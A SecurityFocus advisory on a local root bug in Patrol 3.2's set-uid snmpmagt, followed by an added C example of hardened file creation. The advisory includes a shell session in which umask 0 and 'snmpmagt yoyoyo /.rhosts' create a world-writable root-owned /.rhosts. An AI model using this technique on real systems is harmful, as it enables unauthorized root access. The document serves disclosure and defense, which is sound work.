source: https://www.securityfocus.com/bid/525/info

Patrol 3.2, installed out of the box, allows a local root compromise or denial of service. The vulnerability lies in how snmpmagt creates a file: the file is owned by the owner of its parent directory and may be world-writable. A local user can name any file (for example /.rhosts) and have it created with permissions determined by the user's umask.

maheaa@jedi:/opt/patrol/PATROL3.2/HPUX-PA1.1-V10/bin> ls -al snmpmagt
-rwsr-xr-x 1 root users 185461 Mar 6 1998 snmpmagt*

maheaa@jedi:/opt/patrol/PATROL3.2/HPUX-PA1.1-V10/bin> ls -al /.rhosts
/.rhosts not found

maheaa@jedi:/opt/patrol/PATROL3.2/HPUX-PA1.1-V10/bin> umask 0

maheaa@jedi:/opt/patrol/PATROL3.2/HPUX-PA1.1-V10/bin> snmpmagt yoyoyo /.rhosts

yoyoyo: No such file or directory
snmp bind failure: Address already in use
/opt/patrol/PATROL3.2/HPUX-PA1.1-V10/bin/snmpmagt: error processing configuration

maheaa@jedi:/opt/patrol/PATROL3.2/HPUX-PA1.1-V10/bin> ls -al /.rhosts
-rw-rw-rw- 1 root users 770 Jul 13 14:42 .rhosts

Note: If the file already exists, it keeps the same permissions and its contents are overwritten with "i^A", then the result of gethostname() and some whitespace. This problem is not platform dependent and was tested on an out-of-the-box install on an HP.
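
The hardening a set-uid helper needs against this class of bug, as an added example that is not Patrol's code and not part of the original advisory: create the user-named file under the caller's own uid, refuse existing files, and request a fixed mode so umask 0 cannot widen it. The names create_as_invoker and fd_mode are hypothetical.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Create `path` with the invoking user's rights, never root's.
 * Returns an open fd, or -1 with errno set. (Hypothetical helper.) */
int create_as_invoker(const char *path)
{
    uid_t saved_euid = geteuid();
    int fd, saved_errno;

    /* Drop the effective uid to the real uid before touching the path, so
     * an unprivileged caller cannot create files in root-owned directories. */
    if (seteuid(getuid()) != 0)
        return -1;
    /* O_EXCL: fail instead of overwriting an existing file.
     * O_NOFOLLOW: refuse a symlink as the final path component.
     * 0600 is requested explicitly; umask can only narrow it. */
    fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    saved_errno = errno;
    /* Regain privileges only after the path has been resolved. */
    if (seteuid(saved_euid) != 0) {
        if (fd >= 0)
            close(fd);
        return -1;
    }
    errno = saved_errno;
    return fd;
}

/* Permission bits of an open descriptor, or -1 on error. */
int fd_mode(int fd)
{
    struct stat st;
    return fstat(fd, &st) == 0 ? (int)(st.st_mode & 07777) : -1;
}

int main(int argc, char **argv)
{
    int fd;
    if (argc != 2) { fprintf(stderr, "usage: %s <file>\n", argv[0]); return 2; }
    fd = create_as_invoker(argv[1]);
    if (fd < 0) { perror(argv[1]); return 1; }
    printf("created %s with mode %04o\n", argv[1], (unsigned)fd_mode(fd));
    return close(fd) == 0 ? 0 : 1;
}
```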